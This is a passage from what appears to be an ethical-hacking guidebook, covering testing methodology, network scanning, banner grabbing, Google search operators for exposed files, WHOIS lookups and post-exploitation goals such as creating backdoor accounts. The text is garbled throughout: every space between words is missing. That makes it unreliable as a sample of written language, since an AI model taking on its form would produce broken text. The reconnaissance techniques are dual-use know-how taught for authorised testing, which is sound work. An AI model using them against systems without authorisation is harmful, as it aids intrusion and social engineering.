Youcanperformsometests,suchaspasswordcrackingandnetworkinfrastructureassessments,fromyouroffice.Forexternalteststhatrequirenetworkconnectivity,youmighthavetogooffsite(agoodexcusetoworkfromhome),useanexternalproxyserver,orsimplyuseguestWi-Fi.Somesecurityvendors’vulnerabilityscannerscanevenberunfromthecloud,sothatwouldworkaswell.Betteryet,ifyoucanassignanavailablepublicIPaddresstoyourcomputer,simplyplugintothenetworkontheoutsideofthefirewallforahacker’s-eyeviewofyoursystems.Internaltestsareeasybecauseyouneedonlyphysicalaccesstothebuildingandthenetwork.Youmightbe

abletouseaDSLlineorcablemodemalreadyinplaceforvisitorsandguestaccess.

RespondingtovulnerabilitiesyoufindDetermineaheadoftimewhetheryou’llstoporkeepgoingwhenyoufindacriticalsecurityhole.Youdon’tneedtokeeptestingforever.Justfollowthepathyou’reonuntilyou’vemetyourobjectivesorreachedyourgoals.Whenindoubt,thebestthingtodoistohaveaspecificgoalinmindandthenstopwhenthatgoalhasbeenmet.

Ifyoudon’thavegoals,howareyougoingtoknowwhenyouarriveatyoursecuritytestingdestination?

Havingsaidthis,ifyoudiscoveramajorhole,Irecommendcontactingtherightpeopleassoonaspossiblesothattheycanbeginfixingtheissuerightaway.Therightpeoplemaybesoftwaredevelopers,productorprojectmanagers,orevenCIOs.Ifyouwaitafewdaysorweeks,someonemightexploitthevulnerabilityandcausedamagethatcould’vebeenprevented.

MakingsillyassumptionsYou’veheardaboutwhatyoumakeofyourselfwhenyouassumethings.Evenso,youmakeassumptionswhenyoutestyoursystems.Herearesomeexamplesofthoseassumptions:

Allofthecomputers,networks,applications,andpeopleareavailablewhenyou’retesting.Youhaveallthepropertestingtools.Thetestingtoolsyouusewillminimizethechancesofcrashingthesystemsyoutest.Youunderstandthelikelihoodthatexistingvulnerabilitieswerenotfoundorthatyouusedyourtestingtoolsimproperly.Youknowtherisksofyourtests.

Documentallassumptions.Youwon’tregretit.

SelectingSecurityAssessmentToolsWhichsecurityassessmenttoolsyouneeddependonthetestsyou’regoingtorun.Youcanperformsomeethicalhackingtestswithapairofsneakers,atelephone,andabasicworkstationonthenetwork,butcomprehensivetestingiseasierwithgood,dedicatedtools.

Thetoolsdiscussedinthisbookarenotmalware.Thetoolsandeventheirwebsitesmaybeflaggedassuchbycertainanti-malwareandwebfilteringsoftwarebutthey’renot.ThetoolsIcoverarelegitimatetools—manyofwhichIhaveusedforyears.Ifyouexperiencetroubledownloading,installing,orrunningthetoolsIcoverinthisbook,youmayconsiderconfiguringyoursystemtoallowthemthroughorotherwisetrusttheirexecution.KeepinmindthatIcan’tmakeanypromises.UsechecksumswherepossiblebycomparingtheoriginalMD5orSHAchecksumwiththeoneyougetusingatoolsuchasCheckSumTool(http://sourceforge.net/projects/checksumtool).Acriminalcouldalwaysinjectmaliciouscodeintotheactualtools,sothere’snoguaranteeofsecurity.Youknewthatanyway,right?

Ifyou’renotsurewhattoolstouse,fearnot.ThroughoutthisbookIintroduceawidevarietyoftools—bothfreeandcommercial—thatyoucanusetoaccomplishyourtasks.Chapter1providesalistofcommercial,freeware,andopensourcetools.TheAppendixcontainsacomprehensivelistingoftoolsforyourreference.

It’simportanttoknowwhateachtoolcanandcan’tdoandhowtouseeachone.IsuggestreadingthemanualandotherHelpfiles.Unfortunately,sometoolshavelimiteddocumentation,whichcanbefrustrating.Youcansearchforumsandpostamessageifyou’rehavingtroublewithatool.

Securityvulnerabilityscanningandexploittoolscanbehazardoustoyournetwork’shealth.Becarefulwhenyouusethem.Alwaysmakesurethatyouunderstandwhateveryoptiondoesbeforeyouuseit.Tryyourtoolsontestsystemsifyou’renotsurehowtousethem.Evenifyouarefamiliarwiththem,thisprecautioncanhelppreventDoSconditionsandlossofdataonyourproductionsystems.

Ifyou’relikeme,youmaydespisesomefreewareandopensourcesecuritytools.ThereareplentythathavewastedhoursofmylifethatI’llnevergetback.Ifthesetoolsendupcausingyoumoreheadachesthanthey’reworth,ordon’tdowhatyouneedthemtodo,considerpurchasingcommercialalternatives.They’reofteneasiertouse

http://sourceforge.net/projects/checksumtool

andtypicallygeneratebetterhigh-levelexecutivereports.Somecommercialtoolsareexpensivetoacquire,buttheireaseofuseandfunctionalityoftenjustifytheinitialandongoingcosts.Inmostsituationswithsecuritytools,yougetwhatyoupayfor.

Chapter4

HackingMethodologyInThisChapter

Examiningstepsforsuccessfulethicalhacking

GleaninginformationaboutyourorganizationfromtheInternet

Scanningyournetwork

Lookingforvulnerabilities

Beforeyoudiveinheadfirstwithyoursecuritytesting,it’scriticaltohaveamethodologytoworkfrom.Vulnerabilityassessmentsandpenetrationtestinginvolvesmorethanjustpokingandproddingasystemornetwork.Proventechniquescanhelpguideyoualongthehackinghighwayandensurethatyouendupattherightdestination.Usingamethodologythatsupportsyourtestinggoalsseparatesyoufromtheamateurs.Amethodologyalsohelpsensurethatyoumakethemostofyourtimeandeffort.

SettingtheStageforTestingInthepast,alotofsecurityassessmenttechniquesinvolvedmanualprocesses.Now,certainvulnerabilityscannerscanautomatevarioustasks,fromtestingtoreportingtoremediationvalidation(theprocessofdeterminingwhetheravulnerabilitywasfixed).Somevulnerabilityscannerscanevenhelpyoutakecorrectiveactions.Thesetoolsallowyoutofocusonperformingthetestsandlessonthespecificstepsinvolved.However,followingageneralmethodologyandunderstandingwhat’sgoingonbehindthesceneswillhelpyoufindthethingsthatreallymatter.

Thinklogically—likeaprogrammer,aradiologist,orahomeinspector—todissectandinteractwithallthesystemcomponentstoseehowtheywork.Yougatherinformation,ofteninmanysmallpieces,andassemblethepiecesofthepuzzle.YoustartatpointAwithseveralgoalsinmind,runyourtests(repeatingmanystepsalongtheway),andmovecloseruntilyoudiscoversecurityvulnerabilitiesatpointB.

Theprocessusedforsuchtestingisbasicallythesameastheoneamaliciousattackerwoulduse.Theprimarydifferenceslieinthegoalsandhowyouachievethem.Today’sattackscancomefromanyangleagainstanysystem,notjustfromtheperimeterofyournetworkandtheInternetasyoumighthavebeentaughtinthepast.Testeverypossibleentrypoint,includingpartner,vendor,andcustomernetworks,aswellashomeusers,wirelessnetworks,andmobiledevices.Anyhumanbeing,computersystem,orphysicalcomponentthatprotectsyourcomputersystems—bothinsideandoutsideyourbuildings—isfairgameforattack,anditneedstobetested,eventually.

Whenyoustartrollingwithyourtesting,youshouldkeepalogofthetestsyouperform,thetoolsyouuse,thesystemsyoutest,andyourresults.Thisinformationcanhelpyoudothefollowing:

Trackwhatworkedinprevioustestsandwhy.Helpprovewhatyoudid.Correlateyourtestingwithfirewallsandintrusionpreventionsystems(IPSs)andotherlogfilesiftroubleorquestionsarise.Documentyourfindings.

Inadditiontogeneralnotes,takingscreencapturesofyourresults(usingSnagit,Camtasia,orasimilartool)wheneverpossibleisveryhelpful.Theseshotscomeinhandylatershouldyouneedtoshowproofofwhatoccurred,andtheyalsowillbeusefulasyougenerateyourfinalreport.Also,dependingonthetoolsyouuse,thesescreencapturesmightbeyouronlyevidenceofvulnerabilitiesorexploitswhenitcomestimetowriteyourfinalreport.Chapter3liststhegeneral

stepsinvolvedincreatinganddocumentinganethicalhackingplan.

Yourmaintaskistofindthevulnerabilitiesandsimulatetheinformationgatheringandsystemcompromisescarriedoutbysomeonewithmaliciousintent.Thistaskcanbeapartialattackononecomputer,oritcanconstituteacomprehensiveattackagainsttheentirenetwork.Generally,youlookforweaknessesthatmalicioususersandexternalattackersmightexploit.You’llwanttoassessbothexternalandinternalsystems(includingprocessesandproceduresthatinvolvecomputers,networks,people,andphysicalinfrastructures).Lookforvulnerabilities;checkhowallyoursystemsinterconnectandhowprivatesystemsandinformationare(oraren’t)protectedfromuntrustedelements.

Thesestepsdon’tincludespecificinformationonthemethodsthatyouuseforsocialengineeringandassessingphysicalsecurity,butthetechniquesarebasicallythesame.IcoversocialengineeringandphysicalsecurityinmoredetailinChapters6and7,respectively.

Ifyou’reperformingasecurityassessmentforaclient,youmaygotheblindassessmentroute,whichmeansyoubasicallystartwithjustthecompanynameandnootherinformation.Thisblindassessmentapproachallowsyoutostartfromthegroundupandgivesyouabettersenseoftheinformationandsystemsthatmaliciousattackerscanaccesspublicly.Whetheryouchoosetoassessblindly(i.e.,covertly)orovertly,keepinmindthattheblindwayoftestingcantakelonger,andyoumayhaveanincreasedchanceofmissingsomesecurityvulnerabilities.It’snotmypreferredtestingmethod,butsomepeoplemayinsistonit.

Asasecurityprofessional,youmightnothavetoworryaboutcoveringyourtracksorevadingIPSsorrelatedsecuritycontrolsbecauseeverythingyoudoislegitimate.Butyoumightwanttotestsystemsstealthily.Inthisbook,Idiscusstechniquesthathackersusetoconcealtheiractionsandoutlinesomecountermeasuresforconcealmenttechniques.

SeeingWhatOthersSeeGettinganoutsidelookcanturnupatonofinformationaboutyourorganizationandsystemsthatotherscansee,andyoudosothroughaprocessoftencalledfootprinting.Here’showtogathertheinformation:

Useawebbrowsertosearchforinformationaboutyourorganization.Searchengines,suchasGoogleandBing,aregreatplacestostart.Runnetworkscans,probeopenports,andseekoutvulnerabilitiestodeterminespecificinformationaboutyoursystems.Asaninsider,youcanuseportscanners,networkdiscoverytools,andvulnerabilityscannerssuchasNmap,SoftPerfectNetworkScanner,andGFILanGuard,toseewhat’saccessibleandtowhom.

Whetheryousearchgenerallyorprobemoretechnically,limittheamountofinformationyougatherbasedonwhat’sreasonableforyou.Youmightspendanhour,aday,oraweekgatheringthisinformation.Howmuchtimeyouspenddependsonthesizeofyourorganizationandthecomplexityoftheinformationsystemsyou’retesting.

GatheringpublicinformationTheamountofinformationyoucangatheraboutanorganization’sbusinessandinformationsystemscanbestaggeringandisoftenwidelyavailableontheInternet.Yourjobistofindoutwhat’soutthere.Fromsocialmediatosearchenginestodedicatedintelligence-gatheringtools,youcangainquiteabitofinsightintonetworkandinformationvulnerabilitiesifyoulookintherightplaces.Thisinformationallowsmaliciousattackersandemployeestogainpotentiallysensitiveinformationandtargetspecificareasoftheorganization,includingsystems,departments,andkeyindividuals.IcoverinformationgatheringindetailinChapter5.

ScanningSystemsActiveinformationgatheringproducesmoredetailsaboutyournetworkandhelpsyouseeyoursystemsfromanattacker’sperspective.Forinstance,youcan:

UsetheinformationprovidedbyWHOISsearchestotestothercloselyrelatedIPaddressesandhostnames.Whenyoumapoutandgatherinformationaboutanetwork,youseehowitssystemsarelaidout.ThisinformationincludesdeterminingIPaddresses,hostnames(typicallyexternalbutoccasionallyinternal),runningprotocols,openports,availableshares,andrunningservicesandapplications.Scaninternalhostswhenandwheretheyarewithinthescopeofyourtesting.(Tip:Theyreallyoughttobe.)Thesehostsmightnotbevisibletooutsiders(atleastyouhopethey’renot),butyouabsolutelyneedtotestthemtoseewhatrogue(orevencuriousormisguided)employees,otherinsiders,andevenmalwarecontrolledbyoutsidepartiescanaccess.Aworst-casesituationisthattheintruderhassetupshopontheinside.Justtobesafe,examineyourinternalsystemsforweaknesses.

Ifyou’renotcompletelycomfortablescanningyoursystems,considerfirstusingalabwithtestsystemsorasystemrunningvirtualmachinesoftware,suchasthefollowing:

VMwareWorkstationPro(www.vmware.com/products/workstation/overview.html)VirtualBox,theopensourcevirtualmachinealternativethatworksverywell(www.virtualbox.org)

HostsScananddocumentspecifichoststhatareaccessiblefromtheInternetandyourinternalnetwork.StartbypingingeitherspecifichostnamesorIPaddresseswithoneofthesetools:

Thebasicpingutilitythat’sbuiltintoyouroperatingsystemAthird-partyutilitythatallowsyoutopingmultipleaddressesatthesametime,suchasNetScanToolsPro(www.netscantools.com)forWindowsandfping(http://fping.sourceforge.net)forLinux

ThesiteWhatIsMyIP.com(www.whatismyip.com)showshowyourgatewayIPaddressappearsontheInternet.Justbrowsetothatsite,andyourpublicIPaddress(yourfirewallorrouter—preferablynotyourlocalcomputer)appears.ThisinformationgivesyouanideaoftheoutermostIPaddressthattheworldsees.

http://www.vmware.com/products/workstation/overview.html

http://www.virtualbox.org

http://www.netscantools.com

http://fping.sourceforge.net

http://www.whatismyip.com

OpenportsScanforopenportsbyusingnetworkscanningandanalysistools:

ScannetworkportswithNetScanToolsProorNmap(http://nmap.org).SeeChapter9fordetails.Monitornetworktrafficwithanetworkanalyzer,suchasOmniPeek(www.savvius.com)orWireshark(www.wireshark.com).Icoverthistopicinvariouschaptersthroughoutthisbook.

Scanninginternallyiseasy.SimplyconnectyourPCtothenetwork,loadthesoftware,andfireaway.JustbeawareofnetworksegmentationandinternalIPSsthatmayimpedeyourwork.Scanningfromoutsideyournetworktakesafewmoresteps,butitcanbedone.Theeasiestwaytoconnectandgetanoutside-inperspectiveistoassignyourcomputerapublicIPaddressandplugthatsystemintoaswitchonthepublicsideofyourfirewallorrouter.Physically,thecomputerisn’tontheInternetlookingin,butthistypeofconnectionworksjustthesameaslongasit’soutsideyournetworkperimeter.Youcanalsodothisoutside-inscanfromhomeorfromaremoteofficelocation.

http://nmap.org

http://www.savvius.com

http://www.wireshark.com

DeterminingWhat’sRunningonOpenPorts

Asasecurityprofessional,youneedtogatherthethingsthatcountwhenscanningyoursystems.Youcanoftenidentifythefollowinginformation:

Protocolsinuse,suchasIP,domainnamesystem(DNS),andNetBIOS(NetworkBasicInput/OutputSystem)Servicesrunningonthehosts,suchase-mail,webservers,anddatabaseapplicationsAvailableremoteaccessservices,suchasRemoteDesktopProtocol(RDP),telnet,andSecureShell(SSH)VirtualPrivateNetwork(VPN)services,suchasPPTP,SSL/TLS,andIPsecPermissionsandauthenticationrequirementsfornetworkshares

Youcanlookforthefollowingsamplingofopenports(yournetwork-scanningprogramreportstheseasaccessibleoropen):

Ping(ICMPecho)replies,showingthatICMPtrafficisallowedtoandfromthehostTCPport21,showingthatFTPisrunningTCPport23,showingthattelnetisrunningTCPports25or465(SMTPandSMPTS),110or995(POP3andPOP3S),or143or993(IMAPandIMAPS),showingthatane-mailserverisrunningTCP/UDPport53,showingthataDNSserverisrunningTCPports80,443,and8080,showingthatawebserverorwebproxyisrunningTCP/UDPports135,137,138,139and,especially,445,showingthataWindowshostisrunning

Thousandsofportscanbeopen—65,534eachforbothTCP(TransmissionControlProtocol)andUDP(UserDatagramProtocol),tobeexact.Icovermanypopularportnumberswhendescribingsecuritychecksthroughoutthisbook.Acontinuallyupdatedlistingofallwell-knownportnumbers(ports0–1023)andregisteredportnumbers(ports1024–49151),withtheirassociatedprotocolsandservices,islocatedatwww.iana.org/assignments/service-names-port-numbers/service-names-port-

numbers.txt.Youcanalsoperformaportnumberlookupatwww.cotse.com/cgi-bin/port.cgi.

Ifaservicedoesn’trespondonaTCPorUDPport,thatdoesn’tmeanit’snot

http://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.txt

http://www.cotse.com/cgi-bin/port.cgi

running.Youmayhavetodigfurthertofindout.

Ifyoudetectawebserverrunningonthesystemthatyoutest,youcancheckthesoftwareversionbyusingoneofthefollowingmethods:

Typethesite’snamefollowedbyapagethatyouknowdoesn’texist,suchaswww.your_domain.com/1234.html.Manywebserversreturnanerrorpageshowingdetailedversioninformation.UseNetcraft’sWhat’sthatsiterunning?searchutility(www.netcraft.com),whichconnectstoyourserverfromtheInternetanddisplaysthewebserverversionandoperatingsystem,asshowninFigure4-1.

Figure4-1:Netcraft’swebserverversionutility.

Youcandigdeeperformorespecificinformationonyourhosts:

NMapWin(http://sourceforge.net/projects/nmapwin)candeterminethesystemOSversion.Anenumerationtool(suchasSoftPerfectNetworkScanneratwww.softperfect.com/products/networkscanner)canextractusers,groups,andfileandsharepermissionsdirectlyfromWindows.Manysystemsreturnusefulbannerinformationwhenyouconnecttoaserviceorapplicationrunningonaport.Forexample,ifyoutelnettoane-mailserveronport25byenteringtelnetmail.your_domain.com25atacommandprompt,youmay

http://www.your_domain.com/1234.html

http://www.netcraft.com/

http://sourceforge.net/projects/nmapwin/

https://www.softperfect.com/products/networkscanner

seesomethinglikethis:220mail.your_domain.comESMTPall_the_version_info_

you_need_to_hackReady

Moste-mailserversreturndetailedinformation,suchastheversionandthecurrentservicepackinstalled.Afteryouhavethisinformation,you(andthebadguys)candeterminethevulnerabilitiesofthesystemfromsomeofthewebsiteslistedinthenextsection.

Ane-mailtoaninvalidaddressmightreturnwithdetailede-mailheaderinformation.Abouncedmessageoftendisclosesinformationthatcanbeusedagainstyou,includinginternalIPaddressesandsoftwareversions.OncertainWindowssystems,youcanusethisinformationtoestablishunauthenticatedconnectionsandsometimesevenmapdrives.IcovertheseissuesinChapter12.

AssessingVulnerabilitiesAfterfindingpotentialsecurityholes,thenextstepistoconfirmwhetherthey’reindeedvulnerabilitiesinthecontextofyourenvironment.Beforeyoutest,performsomemanualsearching.Youcanresearchwebsitesandvulnerabilitydatabases,suchasthese:

CommonVulnerabilitiesandExposures(http://cve.mitre.org/cve)US-CERTVulnerabilityNotesDatabase(www.kb.cert.org/vuls)NISTNationalVulnerabilityDatabase(http://nvd.nist.gov)

Thesesiteslistknownvulnerabilities—atleasttheformallyclassifiedones.AsIexplaininthisbook,youseethatmanyothervulnerabilitiesaremoregenericinnatureandcan’teasilybeclassified.Ifyoucan’tfindavulnerabilitydocumentedononeofthesesites,searchthevendor’ssite.Youcanalsofindalistofcommonlyexploitedvulnerabilitiesatwww.sans.org/critical-security-controls.ThissitecontainstheSANSCriticalSecurityControlsconsensuslist,whichiscompiledandupdatedbytheSANSorganization.

Ifyoudon’twanttoresearchyourpotentialvulnerabilitiesandcanjumprightintotesting,youhaveacoupleofoptions:

Manualassessment:Youcanassessthepotentialvulnerabilitiesbyconnectingtotheportsthatareexposingtheserviceorapplicationandpokingaroundintheseports.Youshouldmanuallyassesscertainsystems(suchaswebapplications).Thevulnerabilityreportsintheprecedingdatabasesoftendisclosehowtodothis—atleastgenerally.Ifyouhavealotoffreetime,performingthesetestsmanuallymightworkforyou.Automatedassessment:Manualassessmentsareagreatwaytolearn,butpeopleusuallydon’thavethetimeformostmanualsteps.Ifyou’relikeme,you’llscanforvulnerabilitiesautomaticallywhenyoucanandthendigaroundmanuallyasneeded.

Manygreatvulnerabilityassessmentscannerstestforflawsonspecificplatforms(suchasWindowsandLinux)andtypesofnetworks(eitherwiredorwireless).TheytestforspecificsystemvulnerabilitiesandsomefocusaroundstandardsliketheSANSCriticalSecurityControlsandtheOpenWebApplicationSecurityProject(www.owasp.org).Somescannerscanmapoutthebusinesslogicwithinawebapplication;otherscanmapoutaviewofthenetwork;otherscanhelpsoftwaredeveloperstestforcodeflaws.Thedrawbacktothesetoolsisthattheyfindonlyindividualvulnerabilities;theyoftendon’tnecessarilyaggregateandcorrelatevulnerabilitiesacrossanentirenetwork.That’swhereyourskills,andthemethodologiesIshareinthisbook,comeintoplay!

http://cve.mitre.org/cve/

http://www.kb.cert.org/vuls/

http://nvd.nist.gov/

http://www.sans.org/top20/

http://www.owasp.org/

OneofmyfavoritesecuritytoolsisavulnerabilityscannercalledNexposebyRapid7(www.rapid7.com/products/nexpose).It’sbothaportscannerandvulnerabilityassessmenttool,anditoffersagreatdealofhelpforvulnerabilitymanagement.Youcanrunone-timescansimmediatelyorschedulescanstorunonaperiodicbasis.

Aswithmostgoodsecuritytools,youpayforNexpose.Itisn’ttheleastexpensivetool,butyoudefinitelygetwhatyoupayfor,especiallywhenitcomestootherstakingyouseriously(suchaswhenPCIDSScomplianceisrequiredofyourbusiness).There’salsoafreeversionNexposedubbedtheCommunityEditionforscanningsmallernetworkswithlessfeatures.AdditionalvulnerabilityscannersthatworkwellincludeQualysGuard(www.qualys.com)andGFILanGuard(www.gfi.com/products-and-solutions/network-security-solutions)

AssessingvulnerabilitieswithatoollikeNexposerequiresfollow-upexpertise.Youcan’trelyonthescannerresultsalone.Youmustvalidatethevulnerabilitiesitreports.Studythereportstobaseyourrecommendationsonthecontextandcriticalityofthetestedsystems.

http://www.rapid7.com/products/nexpose

http://www.qualys.com

http://www.gfi.com/products-and-solutions/network-security-solutions

PenetratingtheSystemYoucanuseidentifiedsecurityvulnerabilitiestodothefollowing:

Gainfurtherinformationaboutthehostanditsdata.Obtainaremotecommandprompt.Startorstopcertainservicesorapplications.Accessothersystems.Disableloggingorothersecuritycontrols.Capturescreenshots.Accesssensitivefiles.Sendane-mailastheadministrator.PerformSQLinjection.LaunchaDoSattack.Uploadafileorcreateabackdooruseraccountprovingtheexploitationofavulnerability.

Metasploit(www.metasploit.com)isgreatforexploitingmanyofthevulnerabilitiesyoufindandallowsyoutofullypenetratemanytypesofsystems.Ideally,you’vealreadymadeyourdecisiononwhethertofullyexploitthevulnerabilitiesyoufind.Youmightwanttoleavewellenoughalonebyjustdemonstratingtheexistenceofthevulnerabilitiesandnotactuallyexploitingthem.

Ifyouwanttofurtherdelveintotheethicalhackingmethodology,IrecommendyoucheckouttheOpenSourceSecurityTestingMethodologyManual(www.isecom.org/research/osstmm.html)formoreinformation.

http://www.metasploit.com/

http://www.isecom.org/research/osstmm.html

PartII

PuttingSecurityTestinginMotion

Findouthowtolookforthemostcommonsecurityflawsinafreearticleatwww.dummies.com/extras/hacking.

http://www.dummies.com/extras/hacking

Inthispart…Letthegamesbegin!You’vewaitedlongenough—now’sthetimetostarttestingthesecurityofyoursystems.Butwheredoyoustart?HowaboutwithyourthreePs—yourpeople,yourphysicalsystems,andyourpasswords?Theseare,afterall,threeofthemosteasilyandcommonlyattackedtargetsinyourorganization.

Thispartstartswithadiscussionofhackingpeople(otherwiseknownassocialengineering).Itthengoesontolookatphysicalsecurityvulnerabilities.Ofcourse,I’dberemissinapartaboutpeopleifIskippedpasswords,soIcoverthetechnicaldetailsoftestingthoseaswell.Thisisagreatwaytogettheballrollingtowarmyouupforthemorespecificsecuritytestslaterinthebook.

Chapter5

InformationGatheringInThisChapter

GleaninginformationaboutyourorganizationfromtheInternet

Webresources

Seekingoutinformationyou(andothers)canbenefitfrom

Oneofthemostimportantaspectsindetermininghowyourorganizationisatriskistofindoutwhatinformationispublicallyavailableaboutyourbusinessandyoursystems.GatheringthisinformationissuchanimportantpartofyouroverallmethodologythatIthoughtthesubjectdeservesadedicatedchapter.Inthischapter,Ioutlinesomefreeandeasywaystoseewhattheworldseesaboutyouandyourorganization.Youmaybetemptedtobypassthisexerciseinfavorofthecoolerandsexiertechnicalsecurityflaws,butdon’tfallintothetrap.Gatheringthistypeofinformationiscriticalandoftenwheremostsecuritybreachesbegin.

GatheringPublicInformationTheamountofinformationyoucangatheraboutanorganization’sbusinessandinformationsystemsthatiswidelyavailableontheInternetisstaggering.Toseeforyourself,thetechniquesoutlinedinthefollowingsectionscanbeusedtogatherinformationaboutyourownorganization.

SocialmediaSocialmediasitesarethenewmeansforbusinessesinteractingonline.Perusingthefollowingsitescanprovideuntolddetailsonanygivenbusinessanditspeople:

Facebook(www.facebook.com)LinkedIn(www.linkedin.com)Twitter(https://twitter.com)YouTube(www.youtube.com)

Aswe’veallwitnessed,employeesareoftenveryforthcomingaboutwhattheydoforwork,detailsabouttheirbusiness,andevenwhattheythinkabouttheirbosses—especiallyafterthrowingbackafewwhentheirsocialfilterhasgoneofftrack!I’vealsofoundinterestinginsightbasedonwhatex-employeessayabouttheirformeremployersatGlassdoor(www.glassdoor.com).

WebsearchPerformingawebsearchorsimplybrowsingyourorganization’swebsitecanturnupthefollowinginformation:

EmployeenamesandcontactinformationImportantcompanydatesIncorporationfilingsSECfilings(forpubliccompanies)Pressreleasesaboutphysicalmoves,organizationalchanges,andnewproductsMergersandacquisitionsPatentsandtrademarksPresentations,articles,webcasts,orwebinars

Bing(www.bing.com)andGoogle(www.google.com)ferretoutinformation—ineverythingfromwordprocessingdocumentstographicsfiles—onanypubliclyaccessiblecomputer.Andthey’refree.Googleismyfavorite.Entire

http://www.facebook.com

http://www.linkedin.com

https://twitter.com

http://www.youtube.com

http://www.glassdoor.com

http://www.bing.com

http://www.google.com

bookshavebeenwrittenaboutusingGoogle,soexpectanycriminalhackertobequiteexperiencedinusingthistool,includingagainstyou.(SeeChapter15formoreaboutGooglehacking.)

WithGoogle,youcansearchtheInternetinseveralways:

Typingkeywords.Thiskindofsearchoftenrevealshundredsandsometimesmillionsofpagesofinformation—suchasfiles,phonenumbers,andaddresses—thatyouneverguessedwereavailable.Performingadvancedwebsearches.Google’sadvancedsearchoptionscanfindsitesthatlinkbacktoyourcompany’swebsite.Thistypeofsearchoftenrevealsalotofinformationaboutpartners,vendors,clients,andotheraffiliations.Usingswitchestodigdeeperintoawebsite.Forexample,ifyouwanttofindacertainwordorfileonyourwebsite,simplyenteralinelikeoneofthefollowingintoGoogle:

site:www.your_domain.comkeyword

site:www.your_domain.comfilename

YoucanevendoagenericfiletypesearchacrosstheentireInternettoseewhatturnsup,suchasthis:

filetype:swfcompany_name

UsetheprecedingsearchtofindFlash.swffiles,whichcanbedownloadedanddecompiledtorevealsensitiveinformationthatcanbeusedagainstyourbusiness,asIcoverindetailinChapter15.

UsethefollowingsearchtohuntforPDFdocumentsthatmightcontainsensitiveinformationthatcanbeusedagainstyourbusiness:

filetype:pdfcompany_nameconfidential

WebcrawlingWeb-crawlingutilities,suchasHTTrackWebsiteCopier(www.httrack.com),canmirroryourwebsitebydownloadingeverypublicly-accessiblefilefromit,similartohowawebvulnerabilityscannercrawlsthewebsiteit’stesting.Youcantheninspectthatcopyofthewebsiteoffline,diggingintothefollowing:

ThewebsitelayoutandconfigurationDirectoriesandfilesthatmightnototherwisebeobviousorreadilyaccessibleTheHTMLandscriptsourcecodeofwebpagesCommentfields

Commentfieldsoftencontainusefulinformationsuchasnamesande-mailaddressesofthedevelopersandinternalITpersonnel,servernames,softwareversions,internalIPaddressingschemes,andgeneralcommentsabouthowthecodeworks.Incaseyou’reinterested,youcanpreventsometypesofwebcrawlingbycreatingDisallow

http://www.httrack.com

entriesinyourwebserver’srobots.txtfileasoutlinedatwww.w3.org/TR/html4/appendix/notes.html.Youcanevenenablewebtarpittingincertainfirewallsandintrusionpreventionsystems(IPSs).However,crawlers(andattackers)thataresmartenoughcanfindwaysaroundthesecontrols.

ContactinformationfordevelopersandITpersonnelisgreatforsocialengineeringattacks.IcoversocialengineeringinChapter6.

WebsitesThefollowingwebsitesmayprovidespecificinformationaboutanorganizationanditsemployees:

Governmentandbusinesswebsites:www.hoovers.comandhttp://finance.yahoo.comgivedetailedinformationaboutpubliccompanies.www.sec.gov/edgar.shtmlshowsSECfilingsofpubliccompanies.www.uspto.govofferspatentandtrademarkregistrations.Thewebsiteforyourstate’sSecretaryofStateorsimilarorganizationcanofferincorporationandcorporateofficerinformation.

Backgroundchecksandotherpersonalinformation,fromwebsitessuchas:LexisNexis.com(www.lexisnexis.com)ZabaSearch(www.zabasearch.com)

http://www.w3.org/TR/html4/appendix/notes.html

http://www.hoovers.com

http://finance.yahoo.com

http://www.sec.gov/edgar.shtml

http://www.uspto.gov

http://www.lexisnexis.com

http://www.zabasearch.com

MappingtheNetworkAspartofmappingoutyournetwork,youcansearchpublicdatabasesandresourcestoseewhatotherpeopleknowaboutyoursystems.

WHOISThebeststartingpointistoperformaWHOISlookupbyusinganyoneofthetoolsavailableontheInternet.Incaseyou’renotfamiliar,WHOISisaprotocolyoucanusetoqueryonlinedatabasessuchasDNSregistriestolearnmoreaboutdomainnamesandIPaddressblocks.YoumayhaveusedWHOIStocheckwhetheraparticularInternetdomainnameisavailable.

Forsecuritytesting,WHOISprovidesthefollowinginformationthatcangiveahackeraleguptostartasocialengineeringattackortoscananetwork:

Internetdomainnameregistrationinformation,suchascontactnames,phonenumbers,andmailingaddressesDNSserversresponsibleforyourdomain

YoucanlookupWHOISinformationatoneofthefollowingplaces:

WHOIS.net(www.whois.net)Adomainregistrar’ssite,suchaswww.godaddy.comYourISP’stechnicalsupportsite

TwoofmyfavoriteWHOIStoolwebsitesareDNSstuff(www.dnsstuff.com)andMXToolBox(www.mxtoolbox.com).Forexample,youcanrunDNSqueriesdirectlyfromwww.mxtoolbox.comtodothefollowing:

Displaygeneraldomain-registrationinformationShowwhichhosthandlese-mailforadomain(theMailExchangerorMXrecord)MapthelocationofspecifichostsDeterminewhetherthehostislistedoncertainspamblacklists

AfreesiteyoucanuseformorebasicInternetdomainqueriesishttp://dnstools.com.AnothercommercialproductcalledNetScanToolsPro(www.netscantools.com)isexcellentatgatheringsuchinformation.IcoverthistoolandothersinmoredetailinChapter9.

Thefollowinglistshowsvariouslookupsitesforothercategories:

U.S.Government:www.dotgov.gov/portal/web/dotgov/whoisAFRINIC:www.afrinic.net(RegionalInternetRegistryforAfrica)

http://www.whois.net/

http://www.godaddy.com/

http://www.dnsstuff.com/

http://www.mxtoolbox.com/

http://www.mxtoolbox.com/

http://dnstools.com/


https://www.dotgov.gov/portal/web/dotgov/whois/

http://www.afrinic.net/

APNIC:www.apnic.net/apnic-info/whois_search(RegionalInternetRegistryfortheAsiaPacificRegion)ARIN:http://whois.arin.net/ui(RegionalInternetRegistryforNorthAmerica,aportionoftheCaribbean,andsubequatorialAfrica)LACNIC:www.lacnic.net/en(LatinAmericanandCaribbeanInternetAddressesRegistry)RIPENetworkCoordinationCentre:https://apps.db.ripe.net/search/query.html(Europe,CentralAsia,Africancountriesnorthoftheequator,andtheMiddleEast)

Ifyou’renotsurewheretolookforaspecificcountry,www.nro.net/about-the-nro/list-of-country-codes-and-rirs-ordered-by-country-codehasareferenceguide.

PrivacypoliciesCheckyourwebsite’sprivacypolicy.Agoodpracticeistoletyoursite’susersknowwhatinformationiscollectedandhowit’sbeingprotected,butnothingmore.I’veseenmanyprivacypoliciesthatdivulgealotoftechnicaldetailsonsecurityandrelatedsystemsthatshouldnotbemadepublic.

